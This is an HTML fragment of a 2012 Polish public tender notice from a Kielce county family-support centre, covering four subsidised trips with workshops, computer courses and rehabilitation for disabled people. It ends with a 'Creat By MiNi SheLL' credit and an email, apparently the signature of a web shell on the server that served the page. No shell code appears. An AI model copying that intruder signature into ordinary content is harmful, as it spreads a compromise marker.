<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty ( załącznik nr 1). Dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji Wykonawcy, a jeżeli Wykonawcę reprezentuje pełnomocnik - pełnomocnictwo do reprezentowania Wykonawcy określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania Wykonawcy, 
Jeśli Wykonawca przewiduje udział podwykonawców w realizacji zamówienia do oferty należy załączyć oświadczenie informujące o części zamówienia , której realizacja zostanie powierzona podwykonawcy. 
Program pobytu sporządzony wg załącznika Nr 6, uwzględniający wszystkie wymagania Zamawiającego, opracowany dla każdego wyjazdu osobno.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający, na podstawie art. 144 ust. 1 ustawy PZP zastrzega sobie prawo do zmiany treści istotnych postanowień umowy w przypadku zmniejszenia liczby uczestników wyjazdu z przyczyn niezależnych od Zamawiającego i będącego wynikiem pogorszenia się stanu zdrowia osób biorących udział w wyjeździe, przerwania udziału osoby w projekcie w związku z np.: nieusprawiedliwioną rezygnacją, której nie można było przewidzieć w dniu zawarcia umowy. Wówczas w umowie zmianie ulega przeliczenie kosztu wyjazdu. W takim przypadku koszt wyjazdu stanowi iloczyn kosztu brutto za pobyt jednej osoby niepełnosprawnej lub opiekuna oraz rzeczywistej ilości osób, które rozpoczęły wyjazd.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.kielce.pl  w zakładce bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Kielcach Punkt Konsultacyjno Doradczy dla osób niepełnosprawnych ul. Okrzei 18, IV piętro, lok. 10, 25-525 Kielce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2012 godzina 14:30, miejsce: Powiatowe Centrum Pomocy Rodzinie w Kielcach Punkt Konsultacyjno Doradczy dla osób niepełnosprawnych ul. Okrzei 18, IV piętro, lok. 10, 25-525 Kielce.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII - Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie dziesięciodniowych wyjazdowych warsztatów pn.: Jestem pełnowartościową kobietą połączonych z aktywizacją zdrowotną dla 11 kobiet po mastektomii lub z innymi chorobami nowotworowymi..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie dziesięciodniowych wyjazdowych warsztatów pn.: Jestem pełnowartościową kobietą połączonych z aktywizacją zdrowotną dla 11 kobiet po mastektomii lub z innymi chorobami nowotworowymi. 

1. Instrument aktywizacji edukacyjnej: 
a) szkolenie komputerowe w co najmniej  dwóch grupach, obejmujące tematykę podstawowych informacji związanych z poruszaniem się w sieci internetowej (korzystanie z usług internetowych, bezpieczna praca w systemie, najpopularniejsze portale internetowe, zakładanie i obsługa konta e-mail) w wymiarze min. 15 godzin lekcyjnych każda grupa.
Wykonawca zapewni:
- salę do przeprowadzenia kursu komputerowego z odpowiednim zapleczem technicznym wyposażoną w odpowiednią liczbę miejsc, stolików, dostosowaną do ilości osób szkolonych wraz z zapleczem sanitarnym, - na terenie ośrodka, w którym będą zakwaterowane uczestniczki, 
- komputery po jednym na każdą osobę szkoloną,
- pracę z uczestniczkami według ich potrzeb, 
- catering podczas zajęć (kawa, herbata, napoje, ciastka),  
- bezpłatne materiały szkoleniowe dla każdej uczestniczki szkolenia, które zostaną ujęte w koszcie szkolenia i po jego zakończeniu przejdą w posiadanie absolwentek w/w szkolenia.
2. Instrument aktywizacji zdrowotnej:
a) zorganizowanie i przeprowadzenie 2 badań lekarskich:
- pierwsze celem wykluczenia przeciwwskazań  do zajęć rehabilitacyjnych na początku pobytu,
- drugie celem kontroli efektywności zajęć rehabilitacyjnych dla uczestniczek,
b) zajęcia rehabilitacyjne na basenie - 6 dni po 90 min dziennie:
- adaptacja do środowiska wodnego - oswojenie się ze środowiskiem wodnym;
- dobór ćwiczeń do indywidualnych problemów ruchowych;
- ćwiczenia w wodzie jako czynnik relaksacji i odciążenia ciała;
- wpływ na siłę mięśniową poprzez wykorzystanie warunków odciążenia i oporu jakie stwarza środowisko wodne;
- wpływ na zwiększenie wydolności krążeniowo- oddechowej;
- ćwiczenia rozciągające w wodzie jako czynnik likwidujący przykurcze;
Zajęcia rehabilitacyjne powinny być prowadzone przez osobę posiadającą odpowiednie kwalifikacje.
Zajęcia rehabilitacyjne mogą być zorganizowane i przeprowadzone na terenie ośrodka, w którym będzie odbywała się usługa lub na basenie poza ośrodkiem. W przypadku gdy zajęcia będą odbywały się poza ośrodkiem, wykonawca zapewni transport uczestniczek z ośrodka na basem i z powrotem.    
Na zajęciach oprócz osoby prowadzącej rehabilitację wykonawca zapewni ratownika. 
3. Instrument aktywizacji społecznej: 
a) warsztaty z psychologiem dotyczące akceptacji samego siebie, podnoszenia samooceny, zwiększenia poczucia własnej wartości - 10 godzin lekcyjnych,
b) spotkanie z wizażystą - 3 godziny zegarowe,
c) zajęcia taneczne, nauka układu tanecznego - 3 godziny zegarowe. 
d) zorganizowanie 2 wieczorków integracyjnych: 
- pierwszy obejmujący zapoznanie się uczestniczek wyjazdu z lokalną tradycją i kulturą (zorganizowanie ogniska, przyśpiewki, kuchnia regionalna itp.), 
- drugi - zabawa taneczna.
e) zorganizowanie jednodniowej wycieczki autokarowej - zwiedzanie okolicznych atrakcji turystycznych.
4. Usługa będzie odbywała się w górach na południu Polski.
5. Wykonawca zorganizuje transport zbiorowy dla uczestniczek wyjazdu z miejscowości Kielce do miejsca realizacji usługi oraz z powrotem.
6. Wykonawca zapewni kierownika grupy, który będzie prowadził stały nadzór nad grupą oraz będzie organizował czas wolny uczestniczkom wyjazdu.  Kierownik grupy zapewnia opiekę organizacyjną od momentu wyjazdu grupy z Kielc do momentu powrotu grupy do Kielc. 

Termin wyjazdu: 25.06.2012r - 20.07.2012r.   Wyjazd obejmuje 10 dni, w tym 9 noclegów. 

Zamawiający informuje, że do organizowanej usługi będzie stosował prawo opcji. Podane ilości osób są wielkościami, które Zamawiający maksymalnie skieruje na wyjazd. Zamawiający zakłada, że z przyczyn niezależnych od Zamawiającego ilość osób może ulec zmianie o 2 osoby..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 85.31.25.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie czternastodniowego wyjazdu integracyjnego połączonego z przeprowadzeniem warsztatów dla 25 osób niepełnosprawnych z upośledzeniem umysłowym oraz zapewnienie pobytu dla 5 opiekunów osób niepełnosprawnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2 
Zamówienie obejmuje: 
Przedmiotem zamówienia jest zorganizowanie czternastodniowego wyjazdu integracyjnego połączonego z przeprowadzeniem warsztatów dla 25 osób niepełnosprawnych z upośledzeniem umysłowym oraz zapewnienie pobytu dla 5 opiekunów osób niepełnosprawnych. 

1. Instrument aktywizacji edukacyjnej: 
Wykonawca zorganizuje i przeprowadzi warsztaty z zakresu: 
a) kształtowania umiejętności manualnych Wykonanie drobnych elementów dekoracyjnych z rattanu dla 13 osób niepełnosprawnych, 
b) kształtowania umiejętności manualnych Wykonanie drobnych elementów dekoracyjnych ze skóry dla 12 osób niepełnosprawnych, 
c) zajęcia dla każdej z grup powinny odbywać się w wymiarze minimum 30 godzin lekcyjnych, 
zajęcia dla obu grup powinny odbywać się w tym samym czasie,  
d) zajęcia dla każdej grupy powinny odbywać się na terenie ośrodka, w którym będą zakwaterowani uczestnicy.
e) Wykonawca zapewni wszelkie materiały potrzebne do przeprowadzenia warsztatów oraz niezbędne narzędzia dla uczestników warsztatów. Wytworzone prace przez uczestników pozostają własnością uczestników. 
f) Wykonawca uwzględni możliwość biernego uczestnictwa w warsztatach opiekunów.
2. Instrument aktywizacji społecznej: 
Wykonawca zorganizuje dla uczestników  i opiekunów:
a) dwie całodzienne autokarowe wycieczki (tj. transport, bilety wstępu, opieka pilota, przewodnika),  
b) dwie piesze wycieczki krajoznawcze, 
c) przejażdżkę  bryczką lub wozami konnymi po okolicy, 
d) 2 wyjazdy na basen lub źródła termalne min. po 2 godz., 
e) 2 ogniska z przyśpiewkami i poczęstunkiem (grillowanie, kuchnia regionalna),
3. Wyjazd integracyjny połączony z przeprowadzeniem warsztatów zostanie zrealizowany na obszarze Polski na terenie gór: Tatr, Pienin, Beskidów, Gorc.  
4. Wykonawca zapewni transport uczestników i opiekunów na trasie Łagiewniki  - miejsce zakwaterowania w dniu rozpoczęcia i powrót z miejsca zakwaterowania do Łagiewnik w dniu zakończenia pobytu.
5. Wykonawca zapewni kierownika grupy, który będzie prowadził stały nadzór nad grupą oraz będzie organizował czas wolny uczestnikom wyjazdu.  Kierownik grupy zapewnia opiekę organizacyjną od momentu wyjazdu grupy z Łagiewnik do momentu powrotu grupy do Łagiewnik. 

Termin wyjazdu:  wrzesień  2012r.   Wyjazd obejmuje 14 dni, w tym 13 noclegów.

Zamawiający informuje, że do organizowanej usługi będzie stosował prawo opcji. Podane ilości osób są wielkościami, które Zamawiający maksymalnie skieruje na wyjazd. Zamawiający zakłada, że z przyczyn niezależnych od Zamawiającego ilość osób może ulec zmianie o 2 osoby..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 85.31.25.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zorganizowanie czternastodniowego wyjazdowego szkolenia komputerowego połączonego z aktywizacją zdrowotną dla 22 osób niepełnosprawnych - dysfunkcje zróżnicowane w tym osoby poruszające się o kulach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie czternastodniowego wyjazdowego szkolenia komputerowego połączonego z aktywizacją zdrowotną dla 22 osób niepełnosprawnych - dysfunkcje zróżnicowane w tym osoby poruszające się o kulach.

1. Instrument aktywizacji edukacyjnej: 
a) szkolenie komputerowe w co najmniej dwóch grupach - Komputer od podstaw. Szkolenie powinno obejmować między innymi: podstawy obsługi komputera w systemie Windows, Edytor tekstu MS Word, Arkusz kalkulacyjny MS Excel, korzystanie z Internetu i poczty elektronicznej w wymiarze min. 30 godzin lekcyjnych każda grupa.
Wykonawca zapewni:
- salę do przeprowadzenia kursu komputerowego z odpowiednim zapleczem technicznym wyposażoną w odpowiednią liczbę miejsc, stolików, dostosowaną do ilości osób szkolonych wraz z zapleczem sanitarnym, - na terenie ośrodka, w którym będą zakwaterowani uczestnicy, 
- komputery po jednym na każdą osobę szkoloną,
- pracę z uczestnikami według ich potrzeb, 
- catering podczas zajęć (kawa, herbata, napoje, ciastka),  
- bezpłatne materiały szkoleniowe dla każdego uczestnika szkolenia, które zostaną ujęte w koszcie szkolenia i po jego zakończeniu przejdą w posiadanie absolwentów w/w szkolenia.
2. Instrument aktywizacji zdrowotnej:
- zorganizowanie i przeprowadzenie 2 badań lekarskich: pierwsze celem wskazania zabiegów rehabilitacyjnych na początku pobytu oraz drugie celem kontroli efektywności zabiegów rehabilitacyjnych,
- minimum trzy zabiegi rehabilitacyjne dziennie przez 9 dni pobytu dla uczestników, zgodne z indywidualnymi  zaleceniami lekarskimi,
3. Instrument aktywizacji społecznej: 
a)	zorganizowanie zajęć warsztatowych pn.: Radzenie sobie w trudnych sytuacjach życiowych - 3 godz. zegarowe, 
b)	zorganizowanie 2 wieczorków integracyjnych: 
-	pierwszy - wieczorek taneczny wraz z poczęstunkiem, 
-	drugi obejmujący zapoznanie się uczestników wyjazdu z lokalną tradycją i kulturą  - zorganizowanie ogniska, przyśpiewki, kuchnia regionalna itp., 
c)	zorganizowanie jednodniowej wycieczki autokarowej - zwiedzanie okolicznych atrakcji turystycznych,
d)	zorganizowanie wyjazdu na basen lub źródła termalne min. 2 godziny. 
4. Usługa będzie odbywała się w górach na południu Polski.
5. Wykonawca zorganizuje transport zbiorowy dla uczestników projektu z miejscowości Kielce do miejsca realizacji usługi oraz z powrotem.
6. Wykonawca zapewni kierownika grupy, który będzie prowadził stały nadzór nad grupą oraz będzie organizował czas wolny uczestnikom wyjazdu.  Kierownik grupy zapewnia opiekę organizacyjną od momentu wyjazdu grupy z Kielc do momentu powrotu grupy do Kielc. 

Termin wyjazdu:  lipiec 2012r.   Wyjazd obejmuje 14 dni, w tym 13 noclegów.

Zamawiający informuje, że do organizowanej usługi będzie stosował prawo opcji. Podane ilości osób są wielkościami, które Zamawiający maksymalnie skieruje na wyjazd. Zamawiający zakłada, że z przyczyn niezależnych od Zamawiającego ilość osób może ulec zmianie o 4 osoby..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 85.31.25.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zorganizowanie czternastodniowego wyjazdowego szkolenia komputerowego połączonego z aktywizacją zdrowotną dla 22 osób niepełnosprawnych  - dysfunkcje zróżnicowane..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie czternastodniowego wyjazdowego szkolenia komputerowego połączonego z aktywizacją zdrowotną dla 22 osób niepełnosprawnych  - dysfunkcje zróżnicowane.

1. Instrument aktywizacji edukacyjnej: 
a) szkolenie komputerowe w co najmniej dwóch grupach dla 19 osób niepełnosprawnych - Komputer od podstaw. Szkolenie powinno obejmować między innymi: podstawy obsługi komputera w systemie Windows, Edytor tekstu MS Word, Arkusz kalkulacyjny MS Excel, korzystanie z Internetu i poczty elektronicznej w wymiarze min. 30 godzin lekcyjnych każda grupa.
b) szkolenie komputerowe dla 3 osób niepełnosprawnych - Projektowanie stron internetowych w wymiarze min. 30 godzin lekcyjnych. Jedna osoba jest osobą niedowidzącą, Zamawiający wymaga aby Wykonawca zapewnił odpowiednie oprogramowanie umożliwiające pracę tej osoby na komputerze.  
Wykonawca zapewni:
- salę do przeprowadzenia kursu komputerowego z odpowiednim zapleczem technicznym wyposażoną w odpowiednią liczbę miejsc, stolików, dostosowaną do ilości osób szkolonych wraz z zapleczem sanitarnym - na terenie ośrodka, w którym będą zakwaterowani uczestnicy, 
- komputery po jednym na każdą osobę szkoloną,
- pracę z uczestnikami według ich potrzeb, 
- catering podczas zajęć (kawa, herbata, napoje, ciastka),  
- bezpłatne materiały szkoleniowe dla każdego uczestnika szkolenia, które zostaną ujęte w koszcie szkolenia i po jego zakończeniu przejdą w posiadanie absolwentów w/w szkolenia.
2. Instrument aktywizacji zdrowotnej:
- zorganizowanie i przeprowadzenie 2 badań lekarskich: pierwsze celem wskazania zabiegów rehabilitacyjnych na początku pobytu oraz drugie celem kontroli efektywności zabiegów rehabilitacyjnych,
- minimum trzy zabiegi rehabilitacyjne dziennie przez 9 dni pobytu dla uczestników, zgodne z indywidualnymi  zaleceniami lekarskimi,
3. Instrument aktywizacji społecznej: 
a)	zorganizowanie zajęć warsztatowych pn.: Skuteczna komunikacja - sztuka porozumiewania się - 3 godz. zegarowe, 
b)	zorganizowanie 2 wieczorków integracyjnych: 
-	pierwszy - wieczorek taneczny wraz z poczęstunkiem, 
-	drugi obejmujący zapoznanie się uczestników wyjazdu z lokalną tradycją i kulturą  - zorganizowanie ogniska, przyśpiewki, kuchnia regionalna itp., 
c)	zorganizowanie jednodniowej wycieczki autokarowej - zwiedzanie okolicznych atrakcji turystycznych,
d)	zorganizowanie wyjazdu na basen lub źródła termalne min. 2 godziny. 

4. Usługa będzie odbywała się w górach na południu Polski.
5. Wykonawca zorganizuje transport zbiorowy dla uczestników projektu z miejscowości Kielce do miejsca realizacji usługi oraz z powrotem.
6. Wykonawca zapewni kierownika grupy, który będzie prowadził stały nadzór nad grupą oraz będzie organizował czas wolny uczestnikom wyjazdu.  Kierownik grupy zapewnia opiekę organizacyjną od momentu wyjazdu grupy z Kielc do momentu powrotu grupy do Kielc. 

Termin wyjazdu:  sierpień  2012r.   Wyjazd obejmuje 14 dni, w tym 13 noclegów.

Zamawiający informuje, że do organizowanej usługi będzie stosował prawo opcji. Podane ilości osób są wielkościami, które Zamawiający maksymalnie skieruje na wyjazd. Zamawiający zakłada, że z przyczyn niezależnych od Zamawiającego ilość osób może ulec zmianie o 4 osoby..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 85.31.25.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com